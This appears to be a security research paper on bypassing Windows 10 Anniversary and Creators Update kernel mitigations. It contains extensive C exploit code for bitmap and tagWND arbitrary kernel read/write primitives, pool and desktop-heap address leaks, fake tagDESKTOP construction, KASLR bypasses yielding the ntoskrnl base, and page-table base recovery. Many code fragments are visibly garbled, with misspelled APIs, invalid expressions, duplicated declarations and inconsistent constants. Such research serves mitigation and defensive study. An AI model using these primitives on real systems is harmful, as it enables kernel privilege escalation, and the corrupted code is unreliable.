As this paper shows it is possible, despite the numerous implemented changes and mitigations, to still make use of the bitmap and tagWND kernel-mode read and write primitives. Furthermore, KASLR bypasses are still possible due to design issues and function pointers in kernel-mode structures.
KASLR bypasses together with kernel-mode read primitives allow for de-randomization of the Page Table base address, which allows for reuse of the Page Table Entry overwrite technique. Additionally, it is possible to hook kernel-mode function calls to perform kernel memory allocations of writable, readable and executable memory and retrieving the kernel address of that memory. Using this method overwriting Page Table Entries is not needed and any shellcode can be executed directly when it has been copied onto the newly allocated memory pages.
The overall conclusion is that despite the increased number of mitigations and changes it is still possible to take advantage of Write-What-Where vulnerabilities in Creators Update to gain kernel-mode execution.
Background and Windows Kernel Exploitation History
Kernel Exploitation has been on the rise in recent years, this is most likely a response to the increased security in popular user-mode applications like Internet Explorer, Google Chrome and Adobe Reader. Most of these major applications have implemented sandboxing technologies which must be escaped to gain control of the compromised endpoint.
While sandboxing techniques are not as powerful on Windows 7, kernel exploits have an interest nonetheless, since they allow for privilege escalation. Leveraging kernel vulnerabilities on Windows 7 is considered rather simple, this is due to the lack of security mitigations and availability of kernel information.
It is possible to gain information on almost any kernel object using API’s built into Windows. These include NtQuerySystemInformation1 and EnumDeviceDrivers2 which will reveal kernel drivers base address as well as many kernel objects or pool memory locations3. Using NtQuerySystemInformation it is quite simple to reveal the base address of ntoskrnl.exe
Likewise, objects allocated on the big pool can also be found as described by Alex Ionescu4
While having the addresses of kernel drivers and objects is only a small part of kernel exploitation, it is important. Another crucial factor is storing the shellcode somewhere and getting kernel-mode execution of it. On Windows 7 the two easiest ways of storing the shellcode was to either allocate executable kernel memory with the shellcode in place or by using user memory but executing it from kernel-mode.
Allocating executable kernel memory with arbitrary content can on Windows 7 be done using CreatePipe and WriteFile5, since the content is stored on the NonPagedPool which is executable
---
3 https://recon.cx/2013/slides/Recon2013-Alex%20Ionescu-%20got%20problems%20but%20kernel%20ain%20t%20one.pdf
4 http://www.alex-ionescu.com/?p=231
5 http://www.alex-ionescu.com/?p=231
Gaining kernel-mod execution can be achieved by either overwriting the bServerSideWindowProc bit of a kernel-mode Window object. This causes the associated WProc function to be executed by a kernel thread instead of a user-mode thread. A different way is by overwriting a function pointer in a virtual table, a very commonly used one is HalDispatchTable in ntoskrnl.exe.
Windows 8.1 introduced several hardening initiatives, which resulted in increasing the difficulty of kernel exploitation. To start with the kernel leaking API’s like NtQuerySystemInformation are blocked if called from low integrity, which is the case when the application is running inside a sandbox. Windows 8.1 also made the use of non-executable memory in the kernel widespread, NonPagedPool memory was generally replaced with NonPagedPoolNx memory. Finally, Windows 8.1 introduced Supervisor Mode Execution Prevention (SMEP), which blocks execution of code from user-mode addresses from a kernel-mode context.
These mitigations stop most exploitation techniques which are known in Windows 7, however exploitation is still very much possible, it does require new techniques however. Windows 10 has the same mitigations in place. The two first editions of Windows 10, which are called Windows 10 1507 and 1511 do not have any additional mitigations in place however.
Kernel Read and Write Primitives
To overcome the mitigations put in place in Windows 8.1 and Windows 10, the concept of memory read and write primitives known from user-mode browser exploits were adapted into kernel exploitation. Two kernel-mode read and write primitives are the most popular and mostly used. These are coined bitmap primitive and tagWND primitive.
The bitmap primitive makes use of the GDI object Bitmap, which in kernel-mode is called a Surface object. The principle is to perform allocations of these Surface objects using CreateBitmap such that two bitmap objects are placed next to each other. When this is the case a Write-What-Where vulnerability may be used to modify the size of the first Surface object. The size of a Surface object is controlled by the sizlBitmap field which is at offset 0x38 of the object, it consists of the bitmaps dimensions defined by a DWORD each.
When the size of the bitmap has been increased it is possible to use the API’s SetBitmapBits and GetBitmapBits to modify the second Surface object\(^6\). The field modified is the pointer which controls where the bitmap content is stored. This allows both read and write capabilities at arbitrary kernel memory locations. The read and write functionality can be implemented as shown below:
```c
RtlFillMemory(payLoad, PAGE_SIZE - 0x2b, 0xcc);
RtlFillMemory(payLoad + PAGE_SIZE - 0x2b, 0x100, 0x41);
BOOL res = CreatePipe(&readPipe, &writePipe, NULL, sizeof(payLoad));
res = WriteFile(writePipe, payload, sizeof(payLoad), &resultLength, NULL);
```
\(^6\) https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives
VOID writeWord(DWORD64 addr, DWORD64 value)
{
BYTE *input = new BYTE[0x8];
for (int i = 0; i < 8; i++)
{
input[i] = (value >> 8 * i) & 0xFF;
}
PDWORD64 pointer = (PDWORD64)overwriteData;
pointer[0x10F] = addr;
SetBitmapBits(overwriter, 0xe00, overwriteData);
SetBitmapBits(hwrite, 0x8, input);
return;
}
DWORD64 readWord(DWORD64 addr)
{
DWORD64 value = 0;
BYTE *res = new BYTE[0x8];
DWORD64 pointer = (DWORD64)overwriteData;
pointer[0x10F] = addr;
SetBitmapBits(overwriter, 0xe00, overwriteData);
GetBitmapBits(hwrite, 0x8, res);
for (int i = 0; i < 8; i++)
{
DWORD64 tmp = ((DWORD64)res[i]) << (8 * i);
value += tmp;
}
SetBitmapBits(overwriter, 0xe00, overwriteData);
return value;
}
To perform the overwrite using a Write-What-Where vulnerability requires knowledge of where the Surface object is in kernel-mode. Since this must also work from Low Integrity API’s like NtQuerySystemInformation cannot be used. It is however possible to find the address of the Surface object through the GdiSharedHandleTable structure which is held by the Process Environment Block. The GdiSharedHandleTable is a structure containing all GDI objects, including Surface objects. Using the handle to the user-mode bitmap object it is possible to look up the correct entry in the table, where the kernel-mode address of the Surface object is given.
The second read and write kernel-mode primitive was the tagWND. It uses a similar technique to the bitmap read and write primitive, by allocating two Windows, which has corresponding kernel-mode objects called tagWND. These tagWND objects must also be located next to each other.
A tagWND object may contain a variable size field called ExtraBytes, if the size of this field, which is called cbWndExtra, is overwritten then it is possible to modify the next tagWND object. Using the SetWindowLongPtr API it is now possible to modify arbitrary fields of the following tagWND object, specifically the StrName field, which specifies the location of the title name of the Window. Using the user-mode API’s InternalGetWindowText and NtUserDefSetText it is possible to perform read and write operations at arbitrary kernel memory addresses7.
A write primitive may be implemented as shown below:
Just like with the bitmap read and write primitive, the location of the tagWND object must be known. This is possible using the UserHandleTable presented by the exportable structure called gSharedInfo located in User32.dll. It contains a list of all objects located in the Desktop Heap in kernel-mode, having the handle of the user-mode Window object allows a search through the UserHandleTable, which reveals the kernel-mode address of the associated tagWND object. An implementation is shown below:
```c
while(TRUE)
{
kernelHandle = {HWND}(i | (UserHandleTable[i].wUniq << 0x10));
if (kernelHandle == hwnd)
{
kernelAddr = (DWORD64)UserHandleTable[i].phead;
break;
}
i++;
}
```
To overcome the issue of non-executable kernel memory a technique called Page Table Entry overwrite has become very common. The idea is to allocate shellcode at a user-mode address, resolve its corresponding Page Table Entry and overwrite it. The Page Table contains the metadata of all virtual memory, including bits indicating whether the memory page is executable or not and whether it is kernel memory or not.
Leveraging the kernel-mode write primitive against a Page Table Entry for an allocated page allows for modification of execution status and kernel-mode status. It is possible to turn user-mode memory into kernel-mode memory in regards to SMEP allowing for execution. The base address of the Page Tables is static on Windows 8.1 and Windows 10 1507 and 1511 and the address of the Page Table Entry may be found using the algorithm below:
```c
DWORD64 getPTfromVA(DWORD64 vaddr)
{
vaddr >>= 9;
vaddr &= 0x7FFFFFFF0;
vaddr += 0xFFFF6500000000;
return vaddr;
}
```
Performing an overwrite can also turn non-executable kernel memory into executable kernel memory.
Windows 10 Mitigations
Once executable kernel-mode memory has been created gaining execution may be performed by the same methods as on Windows 7.
In many instances, the base address of ntoskrnl.exe is needed, previously this was done using NtQuerySystemInformation, but since that is no longer possible a very effective way is to use the HAL Heap. This was in many cases allocated at a static address and contains a pointer into ntoskrnl.exe at offset 0x448. Using the kernel-mode read primitive to read the content at address 0xFFFFFFFFFD00448 yields a pointer into ntoskrnl.exe, this may then be used to find the base address of the driver by looking for the MZ header, as shown below
```c
DWORD64 getNtBaseAddr()
{
DWORD64 baseAddr = 0;
DWORD64 ntAddr = readQWORD(0xFFFFFFFFFD00448);
DWORD64 signature = 0x0000054d;
DWORD64 searchAddr = ntAddr & 0xFFFFFFFFFFFF0000;
while (TRUE)
{
DWORD64 readData = readQWORD(searchAddr);
DWORD64 tmp = readData & 0xFFFFFFFF;
if (tmp == signature)
{
baseAddr = searchAddr;
break;
}
searchAddr = searchAddr - 0x1000;
}
return baseAddr;
}
```
This concludes the brief history of kernel exploitation from Windows 7 up to Windows 10 1511.
Windows 10 1607 Mitigations
Windows 10 Anniversary Update, which is also called Windows 10 1607 introduced additional mitigations against kernel exploitation. First, the base address of Page Tables is randomized on startup, making the simple translation of memory address to Page Table Entry impossible. This mitigates the creation of executable kernel-mode memory in many kernel exploits.
Next the kernel-mode address of GDI objects in the GdiSharedHandleTable were removed. This means that it is no longer possible to use this method to locate the kernel-mode address of the Surface objects, which in turn means that it is not possible to overwrite the size of a Surface object, breaking the bitmap kernel-mode read and write primitive.
Finally, the strName field of a tagWND object must contain a pointer which is inside the Desktop Heap when being used by InternalGetWindowText and NtUserDefSetText. This limits its usage since it can no longer be used to read and write at arbitrary kernel-mode address.
Revival of Kernel Read and Write Primitives
This section goes into the mitigations which break the kernel-mode read and write primitives. The first primitive to be examined is the bitmap primitive. The issue to be resolved is how to find the kernel-mode address of the Surface object. If the Surface object has a size of 0x1000 or larger it is in the Large Paged Pool. Furthermore, if the Surface object has a size of exactly 0x1000 the Surface objects will be allocated to individual memory pages.
Allocating many Surface objects of size 0x1000 will cause them to be allocated to consecutive memory pages. This makes sure that locating one Surface object will reveal several Surface objects, which is needed for the kernel-mode read and write primitive. The Large Paged Pool base address is randomized on startup, which requires a kernel address leak.
Inspecting the Win32ThreadInfo field of the TEB shows
```
kd> dt _TEB @$tEB
ntdll! TEB
+0x000 NtTib : _NT_TIB
+0x038 EnvironmentPointer : (null)
+0x040 ClientId : _CLIENT_ID
+0x050 ActiveHpcHandle : (null)
+0x058 ThreadLocalStoragePointer : 0x00000056.4c614058._VPB
+0x060 ProcessEnvironmentBlock : 0x00000056.4c613000._PEB
+0x068 LastErrorValue : 0
+0x06c CountOfOwnedCriticalSections : 0
+0x070 CsrClientThread : (null)
+0x078 Win32ThreadInfo : 0xffff905c.001ecb10._V
```
It turns out the pointer is exactly the address leak we need, since the base address of the Large Paged Pool can be found from it by removing the lower bits. If very large Surface objects are created they will give a predictable offset from the base address, this may be done as seen below
```
```
Using the static offset 0x16300000 will turn the Win32ThreadInfo pointer into an information leak of the Surface object as shown below.
```c
DWORD64 leakPool()
{
DWORD64 teb = (DWORD64)NtCurrentTeb();
DWORD64 pointer = *(PDWORD64)(teb+0x78);
DWORD64 addr = pointer & 0xFFFFFFFF00000000;
addr += 0x16300000;
return addr;
}
```
Inspecting the memory address given by the leakPool function after allocating the large Surface objects shows:
```
kd> dq ffff905c'16300000
ffff905c'16300000 41414141'41414141 41414141'41414141
ffff905c'16300030 41414141'41414141 41414141'41414141
ffff905c'16300060 41414141'41414141 41414141'41414141
ffff905c'16300090 41414141'41414141 41414141'41414141
ffff905c'163000c0 41414141'41414141 41414141'41414141
```
While this does point into the Surface object, it is only the data content of the object. It turns out that it will almost always be the second Surface object, if that is deleted and the freed memory space is reallocated by Surface objects which take up exactly 0x1000 bytes. This is done by allocating close to 10000 Surface objects as seen below:
```
DeleteObject(hbitmap[1]);
```
```c
DWORD64 size2 = 0x1000 - 0x260;
BYTE *pBits2 = new BYTE[size2];
memset(pBits2, 0x42, size2);
HBITMAP *hbitmap2 = new HBITMAP[0x10000];
for (DWORD i = 0; i < 0x2500; i++)
{
hbitmap2[i] = CreateBitmap(0x368, 0x1, 32, pBits2);
}
```
Inspecting the memory address given by the address leak will now reveal a Surface object as seen below:
By exploiting a Write-Where-What vulnerability the size of the Surface can be modified since the size is now at a predictable address.
The second issue is the mitigation of the tagWND kernel-mode read and write primitive. The strName pointer of tagWND can only point inside the Desktop Heap when it is used through InternalGetWindowText and NtUserDefSetText. This limitation is enforced by a new function called DesktopVerifyHeapPointer as seen below.
The strName pointer which is in RDX is compared with the base address of the Desktop Heap as well as the maximum address of the Desktop Heap. If either of these comparisons fail a BugCheck occur. While these checks cannot be avoided the Desktop Heap addresses come from a tagDESKTOP object. The pointer for the tagDESKTOP object is never validated and is taken from the tagWND object. The structure of the tagWND concerning the tagDESKTOP is seen below.
The tagDESKTOP object used in the comparison is taken from offset 0x18 of the tagWND object. When SetWindowLongPtr is used to modify the strName pointer, it is also possible to modify the tagDESKTOP pointer. This allows for creating a fake tagDESKTOP object as seen below.
```c
VOID setupFakeDesktop(DWORD64 wndAddr)
{
g_fakeDesktop = (PDWORD64)VirtualAlloc((LPVOID)0x20000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
memset(g_fakeDesktop, 0x11, 0x1000);
DWORD64 rpDeskuserAddr = wndAddr - g_ulClientDels + 0x18;
g_rpDesk = *(PDWORD64)rpDeskuserAddr;
}
```
This allows the exploit to supply a fake Desktop Heap base and maximum address which is just below and above the pointer dereferenced by strName. This can be implemented as shown below.
```c
VOID writeDWORD(DWORD64 addr, DWORD64 value)
{
DWORD offset = addr & 0xf;
addr -= offset;
DWORD64 filler;
DWORD64 size = 0x8 + offset;
CHAR* input = new CHAR[size];
LARGE_UNICODE_STRING uStr;
if (offset != 0)
{
filler = readDWORD(addr);
}
for (DWORD i = 0; i < offset; i++)
{
input[i] = (filler >> (8 * i)) & 0xFF;
}
for (DWORD i = 0; i < 8; i++)
{
input[i + offset] = (value >> (8 * i)) & 0xFF;
}
RtlInitltergeUnicodeString(&uStr, input, size);
g_fakeDesktop[0x1] = 0;
g_fakeDesktop[0x9] = addr - 0x100;
g_fakeDesktop[0x10] = 0x200;
SetWindowLongPtr(g_window1, 0x118, addr);
SetWindowLongPtr(g_window1, 0x9, 0x2000000000000020);
SetWindowLongPtr(g_window1, 0x58, (DWORD64)g_fakeDesktop);
NtUserGetSetText(g_window2, &uStr);
SetWindowLongPtr(g_window1, 0x58, g_rpDesk);
SetWindowLongPtr(g_window1, 0x118, 0x2000000000000000);
SetWindowLongPtr(g_window1, 0x118, g_winStringAddr);
}
```
Using the modification discussed in this section allows the continued use of both the bitmap and the tagWND kernel-mode read and write primitives.
Windows 10 1703 Mitigations
Windows 10 Creators Update or Windows 10 1703 introduce further mitigations against kernel exploitation. The first mitigation is directed against the tagWND kernel-mode read and write primitive. This is performed in two ways, first the UserHandleTable from the gSharedInfo structure in User32.dll is changed. The previous kernel-mode addresses of all objects in the Desktop Heap is removed as seen below.
First the Windows 10 1607 UserHandleTable is shown
```c
kd> dc poi(user32\gSharedInfo+8)
000002c5 db0f0000 00000000 00000000 00000000 00000000
000002c5 db0f0010 00000000 00010000 fff9bc2'80583040
000002c5 db0f0020 00000000 00000000 00000000 00010000
000002c5 db0f0030 fff9bc2'800ea870 fff9bc2'801047b0
000002c5 db0f0040 00000000 00014004 fff9bc2'800e9b00
000002c5 db0f0050 fff9bc2'800ea700 00000000 00010003
000002c5 db0f0060 fff9bc2'80590820 fff9bc2'801047b0
000002c5 db0f0070 00000000 00014001 fff9bc2'800e9b00
```
Then for Windows 10 1703
```c
kd> dc poi(user32\gSharedInfo+8)
00000222 e31b0000 00000000 00000000 00000000 00000000
00000222 e31b0010 00000000 00000000 00000000 00000000 00000000
00000222 e31b0020 00000000 000202fa 00000000 00000000
00000222 e31b0030 00000000 00000000 00000000 00010000
00000222 e31b0040 00000000 00000000 00000000 00000000 00000000
00000222 e31b0050 00000000 00000000 00000000 00000000 00010003
00000222 e31b0060 00000000 00000000 00000000 00000000 0000002c
00000222 e31b0070 00000000 00000000 00000000 00000000 00010003
```
Like the removal of kernel-mode addresses in GdiSharedHandleTable in Windows 10 1607, this removal of kernel-mode addresses in UserHandleTable removes the possibility of locating the tagWND object. The second change is modification of SetWindowLongPtr, any ExtraBytes written are no longer located in kernel-mode. As shown below the ExtraBytes pointer is taken at offset 0x180 from the beginning of the tagWND object.
```
sub esi, r8d
movsx rcx, esi
add rcx, [rdi+180h] ; RDI == tagWND
loc_1C0053BE:
mov rax, [rcx]
mov [rsp+98h+var_70], rax
mov [rcx], r14 ; RCX -- ExtraBytes
jmp loc_1C005387B
```
Inspecting registers at the point of write shows the value in R14 of 0xFFFFF780000000000 to be written to the address in RCX, which is an address in user-mode.
This clearly breaks the primitive since the strName field of the second tagWND can no longer be modified.
There are two additional changes in Creators Update, the first, which is a minor change, modifies the size of the Surface object header. The header is increased by 8 bytes, which must be considered, else the allocation alignment fails. The second is the randomization of the HAL Heap, this means that a pointer into ntoskrnl.exe can no longer be found at the address 0xFFFFFFFFFD00448.
Revival of Kernel Read and Write Primitives Take 2
With the changes in Windows 10 Creators Update, both kernel-mode read and write primitives break, however the changes to the bitmap primitive are minimal and may be rectified in a matter of minutes by simple decreasing the size of each bitmap to ensure it takes of 0x1000 bytes. The changes for the tagWND kernel-mode read and write primitive are much more substantial.
The Win32ClientInfo structure from the TEB has also been modified, previously offset 0x28 of the structure was the ulClientDelta, which describes the delta between the user-mode mapping and the actual Desktop Heap. Now the contents are different:
```
kd> dq @$teb+800 L6
000000d6'fd73a800'00000000'00000000 00000000'00000000 000000d6'fd73a810'00000000'00000000 00000000'000299'cfe70700'00000299'cfe70000
```
A user-mode pointer has taken its place, inspecting that pointer reveals it to be the start of the user-mode mapping directly, which can be seen below:
```
kd> dq 00000299'cfe70000
00000299'cfe70000 00000000'00000000 010c22c'639ff397 00000299'cfe70010 00000001'ffeefee ffffd25'4e080120 00000299'cfe70020 ffffd25'4e080120 ffffd25'4e080000 00000299'cfe70030 ffffd25'4e080000 00000000'0001400 00000299'cfe70040 ffffd25'4e080060 ffffd25'41c0000 00000299'cfe70050 00000001'00000000 00000000'00000000 00000299'cfe70060 ffffd25'4e0805fe0 ffffd25'4e0805fe0 00000299'cfe70070 00000000'00000000 00000000'00000000
kd> dq ffffd25'4e080000
fffbd25'4e080000 00000000'00000000 00000000'00000000 010c22c'639ff397 fffbd25'4e080010 00000001'ffeefee fffbd25'4e080000 00000299'cfe70000 00000299'cfe70000 00000000'00000000 00000000'00000000
```
In this example, the content of the two memory areas are the same, and that the Desktop Heap starts at 0xFFFFBD2540800000. While the UserHandleTable is removed and the metadata to perform a search for the handle has been removed, the actual data is still present through the user-mode mapping. By performing a manual search in the user-mode mapping it is possible to locate the handle and from that calculate the kernel-mode address. First the user-mapping is found and the delta between it and the real Desktop Heap as seen below.
```c
VOID setupLeak()
{
DWORD64 teb = (DWORD64)NtCurrentTeb();
g_desktopHeap = *(PDWORD64)(teb + 0x828);
g_desktopHeapBase = *(PDWORD64)(g_desktopHeap + 0x28);
DWORD64 delta = g_desktopHeapBase - g_desktopHeap;
g_ulClientDelta = delta;
}
```
Next the kernel-mode address of the tagWND object can be located from the handle:
This overcomes the first part of the mitigation introduced in Creators Update. While the address of the tagWND object can be found, it still does not solve all the problems, since SetWindowLongPtr cannot modify the strName of the following tagWND object, it is still not possible to perform read and write operations of arbitrary kernel memory.
The size of ExtraBytes for a tagWND object denoted by cbWndExtra is set when the window class is registered by the API RegisterClassEx. While creating the WNDCLASSEX structure used by RegisterClassEx another field called cbClsExtra is noted as seen below.
```c
DWORD64 leawknd(HWND hwnd)
{
DWORD i = 0;
PDWORD64 buffer = (PDWORD64)g_desktopHeap;
while (1)
{
if (buffer[i] == (DWORD64)hwnd)
{
return g_desktopHeapBase + i * 8;
}
i++;
}
}
```
This field defines the size of ExtraBytes for the tagCLS object which is associated with a tagWND object. The tagCLS object is also allocated to the Desktop Heap and registering the class just prior to allocating the tagWND makes the tagCLS object to be allocated just before the tagWND object. Allocating another tagWND object after that brings about a layout as seen below.
```c
cls.cbSize = sizeof(WNDCLASSEX);
cls.style = 0;
cls.lpfnWndProc = WProc1;
cls.cbClsExtra = 0x18;
cls.cbWndExtra = 8;
cls.hInstance = NULL;
cls.hCursor = NULL;
cls.hIcon = NULL;
cls.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
cls.lpszMenuName = NULL;
cls.lpszClassName = g_windowClassNames1;
cls.hIconSm = NULL;
RegisterClassExW(&cls);
```
By overwriting the cbClsExtra field of the tagCLS object instead of the cbWndExtra field of the tagWND1 object we obtain an analogous situation to before. Using the API SetClassLongPtr instead of SetWindowLongPtr allows for modification of the ExtraBytes of the tagCLS object. This API has not been modified and still writes its ExtraBytes to the Desktop Heap, which once again allows for modifying the strName field of tagWND2.
An arbitrary write function can be implemented as shown below
```c
VOID writeQWORD(DWORD64 addr, DWORD64 value)
{
DWORD offset = addr & 0xFF;
addr -= offset;
DWORD64 filler;
DWORD64 size = 0x8 + offset;
CHAR* input = new CHAR[size];
LARGE_UNICODE_STRING uStr;
if (offset != 0)
{
filler = readQWORD(addr);
}
for (DWORD i = 0; i < offset; i++)
{
input[i] = (filler >> (8 * i)) & 0xFF;
}
for (DWORD i = 0; i < 8; i++)
{
input[i + offset] = (value >> (8 * i)) & 0xFF;
}
RtlInitLargeUnicodeString(&uStr, input, size);
g_fakeDesktop[0x1] = 0;
g_fakeDesktop[0x10] = addr - 0x100;
g_fakeDesktop[0x11] = 0x200;
SetClassLongPtrW(g_window1, 0x308, addr);
SetClassLongPtrW(g_window1, 0x300, 0x00000002000000020);
SetClassLongPtrW(g_window1, 0x230, (DWORD64)g_fakeDesktop);
NTUserDefSetText(g_window1, &uStr);
SetClassLongPtrW(g_window1, 0x230, g_rpDesk);
SetClassLongPtrW(g_window1, 0x300, 0x0000000e0000000c);
SetClassLongPtrW(g_window1, 0x308, g_winStringAddr);
}
```
A similar arbitrary read primitive can be created as well, thus completely bypassing the mitigations introduced in Creators Update against kernel-mode read and write primitives.
Kernel ASLR Bypass
The mitigations introduced in Windows 10 Anniversary Update and Creators Update have eliminated all publicly known leaks of kernel drivers. Often kernel-mode information leak vulnerabilities are found, but these are patched by Microsoft, of more interest are the kernel driver information leaks which are due to design issues. The last two known KASLR bypasses were due to the non-randomization of the HAL Heap and the SIDT assembly instruction, both have been mitigated in Windows 10 Creators Update and Anniversary Update respectively.
Often kernel driver memory addresses are needed to complete exploits, so discovering new design issues which lead to kernel driver information leaks are needed. The approach used is to make KASLR bypasses which relate to the specific kernel-mode read primitive. So, one KASLR bypass is created for the bitmap primitive and one for the tagWND primitive.
The first one to be discussed is the one related to the bitmap primitive. Looking at the kernel-mode Surface object in the structures reversed engineered from Windows XP and written on REACTOS shows the Surface object to have the following elements
```c
typedef struct _SURFOBJ
{
DHSURF dhsurf; // 0x000
HSURF hsurf; // 0x004
DHPDEV dhpdev; // 0x008
HDEV hdev; // 0x00c
SIZEL sizlBitmap; // 0x010
ULONG cjBits; // 0x018
PVOID pvBits; // 0x01c
PVOID pvScan8; // 0x020
LONG lDelta; // 0x024
ULONG lUniq; // 0x028
ULONG iBitmapFormat; // 0x02c
USHORT iType; // 0x030
USHORT fjBitmap; // 0x032
// size
0x034
}
SURFOBJ, *PSURFOBJ;
```
Reading the description of the field called hdev yields
```
hdev
```
GDI's handle to the device, this surface belongs to. In reality a pointer to GDI's PDEVOBJ.
This gives the question of what is the PDEVOBJ, luckily that structure is also given on REACTOS and contains
The fields of type PFN are function pointers and will give us a kernel pointer. The method for leaking is then to read the hdev field and use that to read out the function pointer. Inspecting the Surface object in memory shows the value of hdev to be empty.
Creating the bitmap object with the CreateBitmap API does not populate the hdev field, however other API’s exist to create bitmaps. Using the CreateCompatibleBitmap API also creates a bitmap and a kernel-mode Surface object, inspecting that object in memory shows it to contain a valid hdev pointer.
Using this pointer and dereferencing offset 0x6F0 gives the kernel-mode address of DrvSynchronizeSurface in the kernel driver cdd.dll.
To leverage this, the following method is employed. First locate the handle to the bitmap which has its Surface object at an offset 0x3000 bytes past the one found with the pool leak. Then free that Surface object by destroying the bitmap and reallocate multiple bitmap objects using the CreateCompatibleBitmap API. This is implemented below.
```c
HBIMAP h3 = (HBIMAP)readQword(0x100);
buffer[5] = (DWORD4)h3;
DeleteObject(h3);
HBIMAP *KASLRbitmap = new HBIMAP[0x100];
for (DWORD i = 0; i < 0x100; i++)
{
KASLRbitmap[i] = CreateCompatibleBitmap(dc, 0x364);
}
```
The hdev pointer is then at offset 0x3030 from the pool leak, which in turn gives the pointer to DrvSynchronizeSurface. DrvSynchronizeSurface contains a call to the function ExEnterCriticalRegionAndAcquireFastMutexUnsafe in ntoskrnl.exe at offset 0x2B as shown below.
```c
kd> dqs fffbd25\4001b010 + 6f0
fffbd25\4001b700 fffbd5f\eced2bf0 cd\!DrvSynchronizeSurface
```
From this pointer into ntoskrnl.exe it is possible to find the base address by checking for the MZ header and searching backwards 0x1000 bytes at a time until it is found. The complete ntoskrnl.exe base address leak function is shown below.
```c
DWORD64 leakNtBase()
{
DWORD64 ObjAddr = leakPool() + 0x3000;
DWORD64 cdd_DrvSynchronizeSurface = readQword(readQword(ObjAddr + 0x30) + 0x6f0);
DWORD64 offset = readQword(cdd_DrvSynchronizeSurface + 0x2d) & 0xFFFFF;
DWORD64 nAddr = readQword(cdd_DrvSynchronizeSurface + 0x31 + offset);
DWORD64 ntAddr = getmodBaseAddr(nAddr);
return ntBase;
}
```
While the above explained KASLR bypass works best while used in conjunction with the bitmap read and write primitive, the tagWND read and write primitive can also make use of a similar idea. By looking at structures documented on REACTOS from Windows XP, the header of a tagWND object is a structure called THRDDESKHEAD, which contains another structure called THROBJHEAD, which in turn contains a pointer to a structure called THREADINFO. This is shown below, first the tagWND structure header.
Followed by the THRDESKHEAD and the THROBJHEAD
Finally, the header of the THREADINFO structure, which contains a structure called W32THREAD
The W32THREAD structure contains a pointer to the KTHREAD object as its first entry
While this is a lot of structure transversal of very old documented structures it is worth noticing that even in Windows 10 Creators Update the KTHREAD contains a pointer into ntoskrnl.exe at offset 0x2A8. Thus given the kernel-mode address of a tagWND object it is possible to gain a pointer to ntoskrnl.exe. By translating the 32-bit Windows XP structures to 64-bit Windows 10 and inspecting memory it becomes clear that dereferencing offset 0x10 of the tagWND object gives the pointer to the THREADINFO object. Dereferencing that pointer gives the address of the KTHREAD, this is shown in memory below
It is possible to wrap this KASLR bypass in a single function, where the base address of ntoskrnl.exe is found from the pointer into notoskrnl.exe in the same fashion as explained for the bitmap primitive.
```c
DWORD64 leakNtBase()
{
DWORD64 wndAddr = leakWnd(g_Window1);
DWORD64 ptr = readDWORD(wndAddr + 0x10);
DWORD64 thread = readDWORD(ptr);
DWORD64 ntAddr = readDWORD(thread + 0x2a8);
DWORD64 ntBase = getModBaseAddr(ntAddr);
return ntBase;
}
```
Dynamic Function Location
In the following sections, it becomes important to locate the address of specific kernel driver functions, while this could be done using static offsets from the header, this might not work across patches. A better method would be to locate the function address dynamically using the kernel-mode read primitive.
The read primitives given so far only read out 8 bytes, but both the bitmap and the tagWND primitive can be modified to read out any given size buffer. For the bitmap primitive this depends on the size of the bitmap, which can be modified allowing for arbitrary reading size. The arbitrary size bitmap read primitive is shown below
```c
BYTE* readData(DWORD64 start, DWORD64 size)
{
BYTE* data = new BYTE[size];
memset(data, 0, size);
ZeroMemory(data, size);
BYTE* pbits = new BYTE[0x0000000100000000];
memmove(pbits, 0x0000000000000000, size);
GetBitmapBits(h1, 0x0000000100000000, pbits);
DWORD64 pointer = (DWORD64)pbits;
pointer[0x18] = start;
pointer[0x18] = 0x0000000000000000;
SetBitmapBits(h1, 0x0000000100000000, pbits);
GetBitmapBits(h2, 0x0000000100000000, pbits);
delete[] pbits;
return data;
}
```
The only difference is the modification of the size values and the size of the data buffer to retrieve in the final GetBitmapBits call. This one read primitive will dump the entire kernel driver, or the relevant part of it into a buffer ready for searching inside user-mode memory.
The next idea is using a simple hash value of the function to locate it. The hash function used is simply adding four QWORDS offset by 4 bytes together. While no proof of collision avoidance will be made, it has turned out to be very effective. The final location function is shown below
```c
DWORD64 locatefunc(DWORD64 modBase, DWORD64 signature, DWORD64 size)
{
DWORD64 hash = 0;
DWORD64 hash = 0;
DWORD64 addr = modBase + 0x12000;
DWORD64 pe = (DWORD64)(modBase + 0x2C) & 0xfffffffffffffff;
DWORD64 codeBase = modBase + (DWORD64)(modBase + pe = 0x2C) & 0xfffffffffffffff;
DWORD64 codeSize = (DWORD64)(modBase + pe = 0x2C) & 0xfffffffffffffff;
if (size != 0)
{
codesize = size;
}
BYTE* data = readData(codeBase, codeSize);
BYTE* pointer = data;
while (1)
{
hash = 0;
for (DWORD i = 0; i < 4; i++)
{
temp = (DWORD)((DWORD64)(pointer + i) * 4);
hash = temp;
}
if (hash == signature)
{
break;
}
addr++;
pointer = pointer + 1;
}
return addr;
}
```
Page Table Randomization
As previously mentioned the most common way of achieving executable kernel memory in Windows 10 is by modifying the Page Table Entry of the memory page where the shellcode is located. Prior to Windows 10 Anniversary Update the Page Table Entry of a given page can be found through the algorithm shown below.
```c
DWORD64 getPTfromVA(DWORD64 vaddr)
{
vaddr >>= 9;
vaddr &= 0x7FFFFFFFF8;
vaddr += 0xFFFFFFFF800000000;
return vaddr;
}
```
In Windows 10 Anniversary Update and Creators Update the base address value of 0xFFFFF68000000000 has been randomized. This makes it impossible to simply calculate the Page Table Entry address for a given memory page. While the base address has been randomized the kernel must still look up Page Table Entries often, so kernel-mode API’s for this must exist. One example of this is MiGetPteAddress in ntoskrnl.exe.
Opening MiGetPteAddress in Ida Pro shows that the base address is not randomized:
```
MiGetPteAddress proc near
shr rcx, 9
mov rax, 7FFFFFFF8h
and rcx, rax
mov rax, 0FFFFFF6800000000h
add rax, rcx
ret
```
However, looking at it in memory shows the randomized base address:
```
nt!MiGetPteAddress:
ffffff800'0CCd1254 48C1e909 shr rcx, 9
ffffff800'0CCd1258 48bB8Fffffff7f000000 mov rax, 7FFFFFFF8h
ffffff800'0CCd1262 4823c8 and rcx, rax
ffffff800'0CCd1265 48b8000000000cffffff mov rax, 0FFFFFFCF000000000h
ffffff800'0CCd126f 4803c1 add rax, rcx
ffffff800'0CCd1272 c3 ret
```
